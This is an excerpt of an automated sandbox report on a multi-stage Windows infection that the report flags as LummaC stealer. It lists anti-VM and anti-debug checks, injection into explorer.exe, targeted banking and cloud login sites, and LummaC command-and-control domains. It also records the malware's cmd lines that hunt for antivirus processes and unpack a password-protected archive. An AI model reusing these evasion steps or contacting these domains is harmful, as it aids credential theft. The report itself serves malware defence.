                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                          Source: file.exe, file.exe, 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmp, db77c3e215.exe, 0000002E.00000002.3040315631.0000000000303000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166288106.0000000003851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                          Source: explorer.exe, 00000021.00000002.2944554300.000000000125B000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3807607263.0000000001927000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3812151194.0000000004191000.00000004.00000800.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000003.3039999066.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041344893.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041593577.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041796343.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3347092723.0000000001089000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353112558.0000000001089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Dry.com, 0000002C.00000002.3812151194.0000000004191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQc
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                          Source: 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0=U
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                          Source: explorer.exe, 00000035.00000002.3283875362.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                          Source: PING.EXE, 00000020.00000002.2952073566.000001B3BA36B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                          Source: ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                          Source: 4fa7efe79d.exe, 00000031.00000002.3352843768.000000000104D000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3341633899.000000000104C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh{
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166288106.0000000003851000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                          Source: file.exe, 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmp, db77c3e215.exe, 0000002E.00000002.3040315631.0000000000303000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: 4fa7efe79d.exe, 00000031.00000003.3347092723.0000000001089000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353112558.0000000001089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                          Source: PING.EXE, 0000002A.00000002.2982761611.0000027F001A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj
                          Source: 4fa7efe79d.exe, 00000031.00000003.3166480897.00000000037DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                          Source: ea2827841c.exe, 00000032.00000003.3230188462.00000000067F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeThread information set: HideFromDebugger
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile opened: SIWVID
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSystem information queried: KernelDebuggerInformation
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\explorer.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess queried: DebugPort
                          Source: C:\Windows\explorer.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A70C76 rdtsc 0_2_04A70C76
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009F4FF BlockInput,44_2_0009F4FF
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0002338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,44_2_0002338B
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_006A66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,10_2_006A66A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008652B mov eax, dword ptr fs:[00000030h]0_2_0008652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008A302 mov eax, dword ptr fs:[00000030h]0_2_0008A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FCA302 mov eax, dword ptr fs:[00000030h]2_2_00FCA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FC652B mov eax, dword ptr fs:[00000030h]2_2_00FC652B
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00045058 mov eax, dword ptr fs:[00000030h]44_2_00045058
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,44_2_000820AA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00052992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00052992
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00040BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00040BAF
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00040D45 SetUnhandledExceptionFilter,44_2_00040D45
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00040F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00040F91
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exeMemory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: Dry.com PID: 4952, type: MEMORYSTR
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeMemory written: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe base: 400000 value starts with: 4D5A
                          Injects code into the Windows Explorer (explorer.exe)
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140000000 value: 4D
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140001000 value: 40
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 1402DD000 value: 58
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 14040B000 value: A4
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140739000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 14075E000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 14075F000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140762000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140764000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 140765000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 5284 base: 109E010 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140000000 value: 4D
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140001000 value: 40
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 1402DD000 value: 58
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 14040B000 value: A4
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140739000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 14075E000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 14075F000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140762000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140764000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: 140765000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 2448 base: D5C010 value: 00
                          LummaC encrypted strings found
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                          Source: db77c3e215.exe, 0000002E.00000003.2997533608.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                          Source: 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                          Source: 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: treehoneyi.click
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 5284
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 2448
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00081B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,44_2_00081B4D
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0002338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,44_2_0002338B
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008BBED SendInput,keybd_event,44_2_0008BBED
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008EC6C mouse_event,44_2_0008EC6C
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe "C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe "C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe "C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe "C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe "C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe "C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
